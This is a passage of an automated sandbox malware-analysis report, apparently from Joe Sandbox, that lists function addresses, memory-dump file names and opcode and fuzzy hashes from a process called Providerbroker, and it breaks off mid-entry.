Opcode ID: 2b12deeb09e560e4b09967c7d1d2917ce7e6b6610a59fd96eda22f7229f9d294
Instruction ID: b9b1e43e83be1a2849fb7409cdc1b9948a4791fc257561cdd77489bca438079e
Opcode Fuzzy Hash: 2b12deeb09e560e4b09967c7d1d2917ce7e6b6610a59fd96eda22f7229f9d294
Instruction Fuzzy Hash: 1B31D72094E3C58FF713A734AC546E93F61AF43368F2D01EAD095CE0A3DA990516C752

Function 00007FF84959132D Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362e4e0f1b8a476ad8b6a01f5fcb19d81452f6ef8ea6e398f142358ef4f00c36
Instruction ID: 61b34e752ce6f5be00e876e2716e82ec4db6fcf83300df666f57401d5870762a
Opcode Fuzzy Hash: 362e4e0f1b8a476ad8b6a01f5fcb19d81452f6ef8ea6e398f142358ef4f00c36
Instruction Fuzzy Hash: 82316031F1C95A8FEB58FE5CD4919A8B7E2FF59354B154179C01ED3682CF24B8128B81

Function 00007FF849593FD5 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5a77d2426afbbb6b85f4418aa4cadcd8729db334bfb55500421ef8c5dc6d2a
Instruction ID: 466d743ef381592610f2a65207c7f9d6b3c901524a3664bd4f4486e18e158a9e
Opcode Fuzzy Hash: 7d5a77d2426afbbb6b85f4418aa4cadcd8729db334bfb55500421ef8c5dc6d2a
Instruction Fuzzy Hash: 1C313B30D1C99ACFEBA8EF5488559BD77B1FF44388F6201BAD02ECB581DA396D409741

Function 00007FF84959D545 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee3f265a6dfe947351183503c17598667ef861ab2f98b747cf19d3318746487
Instruction ID: c95265c5a2294f310f2ae02807b0c2c0421e6e1ce7dc4f198823ee2ba772687f
Opcode Fuzzy Hash: 9ee3f265a6dfe947351183503c17598667ef861ab2f98b747cf19d3318746487
Instruction Fuzzy Hash: 1731E471D1C98A4FFB68BF2858522A8B7E1FF45358F65017AE06DC72C2DE1C68058391

Function 00007FF84959D48B Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0150628249eade127fb51c936fccc2c0313baa41761168ee00a09cc48ee307a2
Instruction ID: 2cf15a94529aa78de8b5707e660e9225a5ed12f659fb23563538c8e76f3eb084
Opcode Fuzzy Hash: 0150628249eade127fb51c936fccc2c0313baa41761168ee00a09cc48ee307a2
Instruction Fuzzy Hash: E5311E71E1C95A9FEB58EF5CD891AB8B3A1FF58354B218139D01DD7681CB24BC118B80

Function 00007FF8495913EA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355d19c53c42c3efba36a8a0ecd43656cbdc1763bef4f4ce03238d23875b9b14
Instruction ID: 17a3abc21a595fae38c50ef96ac2c16043e7ac4095f291d0cd7da03b9fbc3eed
Opcode Fuzzy Hash: 355d19c53c42c3efba36a8a0ecd43656cbdc1763bef4f4ce03238d23875b9b14
Instruction Fuzzy Hash: B631D531E1C9964FF768BA6858517F8B7D1FF9A394F550179C06DC72C2EE1868058381

Function 00007FF84959CE99 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d92145a85b0f272a0b7133d652a330ad2bc8bc698f321b0318d6e792dbe971
Instruction ID: ef4a108c41d5a4d71c1853a7f2f58392efe80ec5e918c6f013611e23b27b7e57
Opcode Fuzzy Hash: b6d92145a85b0f272a0b7133d652a330ad2bc8bc698f321b0318d6e792dbe971
Instruction Fuzzy Hash: 67310770E189599FEBA8EF58C855AADB7F1FF59314F1000BED01EE3291CB34A9808B00

Function 00007FF8495A0EF2 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c93f601890765bda86f15c64a78e777adbfefa92d5a6dc25e201f5b0537e6c1
Instruction ID: 57c3dc2bb3a859ce10f1f04757c6e8b225ee7fff3b2239cc02f7c821ce132fcf
Opcode Fuzzy Hash: 2c93f601890765bda86f15c64a78e777adbfefa92d5a6dc25e201f5b0537e6c1
Instruction Fuzzy Hash: 1631BF31D2DACD8FDBA5EF64CC605AC7BB1FF5A350F2500BAD00AE7192DA286805CB55

Function 00007FF849592EC0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d66d5788125681974557876720ed2b46dd0e092ff259737661b13db849ed51a
Instruction ID: 5894d22f5037d680eff40843e4f2a5a2b7a7b3be048111fc50ca81b3d09a1f37
Opcode Fuzzy Hash: 4d66d5788125681974557876720ed2b46dd0e092ff259737661b13db849ed51a
Instruction Fuzzy Hash: 4E31381081C5D74EF33AAA185C615707BA1EF93305B3A86FAD0ABCB4CBD92CA8858341

Function 00007FF848E9A283 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a76772ff89fa0896eb9ed05eb98717303048b2eb5e8dbcd33fc14f07e03ffa
Instruction ID: 8b036588471a0013c0bef9f63d200e0fa07d475d6221d2d89adf6890213898d2
Opcode Fuzzy Hash: f3a76772ff89fa0896eb9ed05eb98717303048b2eb5e8dbcd33fc14f07e03ffa
Instruction Fuzzy Hash: 3031B6B0A0851C9FDBA8EB04C895BE9B3F1FB68305F5011EE910EE3261CA716AC0CF45

Function 00007FF848E90C25 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96275c0db77e8b5782ee6b58a9882f3983f7882c55350684b3022dc5917c00b5
Instruction ID: 06619289bee2f4923ee478fc65603eba3111ae3ccd0c39968e786d8c1f416f1a
Opcode Fuzzy Hash: 96275c0db77e8b5782ee6b58a9882f3983f7882c55350684b3022dc5917c00b5
Instruction Fuzzy Hash: F9312271E0C69A9FE301BBA8C8053FD77A0FF42395F440576C145972D2CBB82449CB99

Function 00007FF8495A0105 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd10765135741edb6ced13177dc7797ce27db113b6441910e88e8aac6ce4b179
Instruction ID: 3fe361b43de5a61f58b56535c1ec52ebbc2c0c536307742c94762b35483019ab
Opcode Fuzzy Hash: bd10765135741edb6ced13177dc7797ce27db113b6441910e88e8aac6ce4b179
Instruction Fuzzy Hash: 00310B3092C68A8FEBA8EF648C455FD77B1FF67350F61007AD42ED2281DB39A9009B45

Function 00007FF84959EFF0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62563ff0772575714063a3d2eb55d144192b15d532ad7b92a6a75135f0989458
Instruction ID: 7e0bfc9881bcd547ba796a1da81fdf2d97b719d3d6b0c711e9dcd2f4a532be25
Opcode Fuzzy Hash: 62563ff0772575714063a3d2eb55d144192b15d532ad7b92a6a75135f0989458
Instruction Fuzzy Hash: AC312B1095C6E64EF33AAB144C605747F95EF52359B3946FAC8ABCB4C7C82CBD818341

Function 00007FF84959C568 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b4259352118646aadc0957f28f74a7cff589487d36e274c66023e5cc75e688
Instruction ID: 48a8211a9f46d2ff3aa8316b794c488983391b92ac71f2f3e362970d81053405
Opcode Fuzzy Hash: 94b4259352118646aadc0957f28f74a7cff589487d36e274c66023e5cc75e688
Instruction Fuzzy Hash: DF115722C4D9CA0FF72AAB3898211E53BF1EF86384F1A41F6D05CCB087DD19A8058381

Function 00007FF8495902C2 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b49d9e3a594ea974ce4c67a5d2dd8dc39674e274c4833c46a36f3646861b8bf5
Instruction ID: dc7345ec1243225f04da02b67debd4c0b2879725d1734069a068590525a60b6e
Opcode Fuzzy Hash: b49d9e3a594ea974ce4c67a5d2dd8dc39674e274c4833c46a36f3646861b8bf5
Instruction Fuzzy Hash: EC21EA31E1895D9FDF98EF68D865AEDB7F1FF58314F1001AAD01EE3291CA35A9818B40

Function 00007FF8495A1A62 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f5cea710a63a5ede3e4703f2ed32853e1861481de5eea327cdd2638d4a1c69
Instruction ID: d967c68d3d48cd93a0c88fb3361621236eb8b40116f95fcd94f0dd3dd498a925
Opcode Fuzzy Hash: 56f5cea710a63a5ede3e4703f2ed32853e1861481de5eea327cdd2638d4a1c69
Instruction Fuzzy Hash: D121FC30E1895D9FDF98EF18D895AACB7B1FF58310F1001A9D01EE3291CE35A941CB44

Function 00007FF84959CEE2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288bc2db4c7327307efccf0691fe4b85b7dbfb3eeead86597a514a43d4e5d762
Instruction ID: bdee2c3715e0e05c3f6b79c113a3c4f77ad5beb49ca4634e3bec0852693cbba9
Opcode Fuzzy Hash: 288bc2db4c7327307efccf0691fe4b85b7dbfb3eeead86597a514a43d4e5d762
Instruction Fuzzy Hash: 9221E470E1895D9FDFA8EF58C855AACB7B1FB58304F1041AAD01EE3291CB34A9818B40

Function 00007FF8495A0E6D Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6a20a2aa65f1922104b77b083193e3c87e99c133cfdae34dfd48871c73f0a4
Instruction ID: 92d81419d846525dea569061d9d6153f42a2222a3f955b8c8f461cf80bbf2314
Opcode Fuzzy Hash: 3e6a20a2aa65f1922104b77b083193e3c87e99c133cfdae34dfd48871c73f0a4
Instruction Fuzzy Hash: C8210831D4EB9ADFDB65EF78D8504FD7BA0EF02364B2500B6D099AB083DE256805C744

Function 00007FF848E9115D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0223dd0aa126536251d54603f0b49c0bd3c4e462ccd2d5af3bc6cd0f22ef0c6
Instruction ID: be05b4ab81483ea0f47c0f906119b160dc2516ee00cd3cd04659524193fb0faf
Opcode Fuzzy Hash: e0223dd0aa126536251d54603f0b49c0bd3c4e462ccd2d5af3bc6cd0f22ef0c6
Instruction Fuzzy Hash: 07213C30A1881D9FDB84FBA8C889AADB3F1FF68344F10057AD409D3295EF35A941CB54

Function 00007FF84959CBE1 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9dc4d8485ebe923238afcd15bbc46373773fee01b88e9215212cd7bbaf4cfdf
Instruction ID: e99ab2fae1a43ab8d330e1951ca43e7eb2bec67e508ac9dfcbe2cb5d46c8c335
Opcode Fuzzy Hash: a9dc4d8485ebe923238afcd15bbc46373773fee01b88e9215212cd7bbaf4cfdf
Instruction Fuzzy Hash: 32119D91D4D5D38EF6397E65AE611B82E70AF45BD8F3A01BAD43E8A1C3CC4C28452396

Function 00007FF849591F70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf60d2ffa77e99c73c55d35db809ee9f8a7a06260bd041e225b1a24c39971af
Instruction ID: a4d85f66e7a05cfdc4bc0524869cd5af5519eba59ef9716ca95314dc9b859e12
Opcode Fuzzy Hash: 6cf60d2ffa77e99c73c55d35db809ee9f8a7a06260bd041e225b1a24c39971af
Instruction Fuzzy Hash: E5110621A1CD499EEA64FF6890515FA73D5FFA4390F104A3AD15EC30C2DE18E80583C1

Function 00007FF849597210 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c0ac59f16687c439631d688aa72fa9be57550f49c85a066ae2bfc3788c236f
Instruction ID: c83f6913faf5ae1ad146f546ef5859fd9b9abf257ba719a9ebffca43b2be19bb
Opcode Fuzzy Hash: 19c0ac59f16687c439631d688aa72fa9be57550f49c85a066ae2bfc3788c236f
Instruction Fuzzy Hash: 4801F531E0C58A5FF7746A6859082BD3699DF463C8F220539F01FE7181CDA87C058751

Function 00007FF849591DEE Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f006098442945df4c24ae599cfaa3ac5495887d214d242366228d8594571875d
Instruction ID: 372d35650e3c5806da28e78dfb40ea88d1e299c89c0737f4f2056b2c2200d00c
Opcode Fuzzy Hash: f006098442945df4c24ae599cfaa3ac5495887d214d242366228d8594571875d
Instruction Fuzzy Hash: AE11443220C84A8FF718AF5CD4406E97395FFE53A4F24456ADA69C31C0CA28E81187C0

Function 00007FF84959DF1E Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9236eb98b00d8036a9b263456bb270d75a3025997751399d26360afc6144c210
Instruction ID: c29a15901b3ed9b64f2a5c779e709a2ad2ed66a296407fb45ccf25a613b46d4e
Opcode Fuzzy Hash: 9236eb98b00d8036a9b263456bb270d75a3025997751399d26360afc6144c210
Instruction Fuzzy Hash: B501893220C0858FF714AF5CE8543F97394EFE5354F24057BE569C32D1CA19984087C0

Function 00007FF84959C308 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a68b3aa03c8aaf3e4ed8f52aad1b311328eb9bf48758bf706ce74b2b3b19a4
Instruction ID: e2be15ab6fe5c28377d6b6cbf9025dc85410aca51ea3a6c3d1409ffa50af1499
Opcode Fuzzy Hash: 25a68b3aa03c8aaf3e4ed8f52aad1b311328eb9bf48758bf706ce74b2b3b19a4
Instruction Fuzzy Hash: 9501FC71F0C68AAFE734AE6868191BD36A9EF553D0F214439D01FE3190DE6968458B44

Function 00007FF848E90C48 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ad7a9a4c177090245bb8fcafeb53cc98f76aa4a89ad42d83526dfd81f1d00f
Instruction ID: 020cfbbe8621c586a4a4a2234f856644943ab0a51ed9c887cfe10f3c1954856d
Opcode Fuzzy Hash: 84ad7a9a4c177090245bb8fcafeb53cc98f76aa4a89ad42d83526dfd81f1d00f
Instruction Fuzzy Hash: 9C01F571D0D69A9FE701FB64C8002EA7770FF42354F044576D101972D2CB782154C785

Function 00007FF848E90C50 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf2384227a5ad68c30241b4413dc1940ce7619e2d0409f7afab7c5815c5e1f1
Instruction ID: e56d4f89f885a574f883dd06c80cfd92460a0e98d9e665a9e7855acd5824bf80
Opcode Fuzzy Hash: aaf2384227a5ad68c30241b4413dc1940ce7619e2d0409f7afab7c5815c5e1f1
Instruction Fuzzy Hash: 1601DF70D0D69A9EE701FBA4C8442EABBB0FF42354F044576D51197292CFB82254C789

Function 00007FF84959AA2D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801fee1a5fe24df0e9faea08d5db82ef75198dc859f304d0f554a1391c9554a3
Instruction ID: 568191bf873e619b47965e91b6c81e68488cf95ecbb7beff7cd0e5dfd63241f6
Opcode Fuzzy Hash: 801fee1a5fe24df0e9faea08d5db82ef75198dc859f304d0f554a1391c9554a3
Instruction Fuzzy Hash: C101A222D0CAC68FF2B9AE245D611B47BA1EF14344F2A02FAC05EC65C3DD186C848791

Function 00007FF848E91328 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4202e0276aaf3448294fc618c83cf26a483e4e91d29ad3632663af074590162
Instruction ID: a232b77c4f04dd25ce9bab82acddd8018894f5a019e4de03debb755382645834
Opcode Fuzzy Hash: e4202e0276aaf3448294fc618c83cf26a483e4e91d29ad3632663af074590162
Instruction Fuzzy Hash: 8401A874908A4D9FDF84EF58D448AAE7BF1FF68345F00056AE419D7250DB30E994CB80

Function 00007FF848E90B9D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a71229f5d9cc9fa8c6b8d2c6461f87f2f4b43c69833ac538d97c86774ddae8b
Instruction ID: 4dc7b912f084ade65e5346f99a13bc1b14d562f94b0a674442678b6949ad2644
Opcode Fuzzy Hash: 4a71229f5d9cc9fa8c6b8d2c6461f87f2f4b43c69833ac538d97c86774ddae8b
Instruction Fuzzy Hash: 0401E470A2864DCFCB84EF18C881AA97BE0FF58344F0002A5E849D3250CB30E961CB81

Function 00007FF84959CE2D Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cf38cf1c45e4133a082d8a2e0cd509244e9d98cc19fb2bccc460a523da64629
Instruction ID: 08462b3ff3172068495e6aaeb4463f68499934673fca3ac12f448f66ec851027
Opcode Fuzzy Hash: 2cf38cf1c45e4133a082d8a2e0cd509244e9d98cc19fb2bccc460a523da64629
Instruction Fuzzy Hash: 6A015474908A5DCFDF69EF98C895AACBBB1FF68745F20019DC00AEB251CA31A941DF00

Function 00007FF8495905D2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861e917cb9153f1495443fdfe3902eec180aa32675911af4fef3c708f2320226
Instruction ID: 8d14fe7c53a4de3e5c1ec5598d8cd3babe964ab58e63037ea2308af0b86dac72
Opcode Fuzzy Hash: 861e917cb9153f1495443fdfe3902eec180aa32675911af4fef3c708f2320226
Instruction Fuzzy Hash: 13F0C23184D3C59FE722EF70CC155E53FA0AF43344B1A00FAE4568B0A2C62D5616C761

Function 00007FF8495A1D72 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765141b45a9c288535c84361673dc652bf16e4e22e58b227ed8d83a1441d0099
Instruction ID: c17cb9fd02854cf4cb04c599c32fc93c220d6a54dd3ffda83df756eb22950858
Opcode Fuzzy Hash: 765141b45a9c288535c84361673dc652bf16e4e22e58b227ed8d83a1441d0099
Instruction Fuzzy Hash: 3FF0F63144E3C59FE312AF709C118E53FB4EF03254F2901F6D066CB0A2C92D160AC751

Function 00007FF848E906A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f506c26fa0d63254503f78c07b18a803e30fe441dd73150ec13b41e9ebdb4ca
Instruction ID: 61f07ee4f759ac68456c201a0cf599a917cad416d036128ebe06aeabd812b26a
Opcode Fuzzy Hash: 4f506c26fa0d63254503f78c07b18a803e30fe441dd73150ec13b41e9ebdb4ca
Instruction Fuzzy Hash: 49F0303191960D9FEB80FF68D4496ED77A0FF94345F500576E81CD2191DB74A1A0CB85

Function 00007FF848E906C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0912adf7d165dd49226dcb41adf0e7620098235a270ffbaec063e7f8a632c4
Instruction ID: 0ddb835b05a8271d61a963fa762cebc8b232cad9c7928d24dde426f56dba1e60
Opcode Fuzzy Hash: cf0912adf7d165dd49226dcb41adf0e7620098235a270ffbaec063e7f8a632c4
Instruction Fuzzy Hash: A9F01530918A4E9FEB80FF68D8496EE7BE4FF58345F400576E81DD2191DB34A6A0CB85

Function 00007FF84959D11F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
Instruction ID: bc6c0be2221bf5ad24e2b354070bcef05bc77c885255a051dc84a05d65b1aacc
Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
Instruction Fuzzy Hash: A3F0D47490A99CDFCF55EBA8C85AE99BBB0FF68300F1001DDD00ADB262CA319845CF40

Function 00007FF84959AA95 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d9b55605b2e1e2743ab002c27dce042b618df8265e9890561be665cb1f11c11
Instruction ID: da8ec76502c4b5bd023fdcc022d68e5d531e4ac3c4ff6cc8fa8ae99df931fee9
Opcode Fuzzy Hash: 6d9b55605b2e1e2743ab002c27dce042b618df8265e9890561be665cb1f11c11
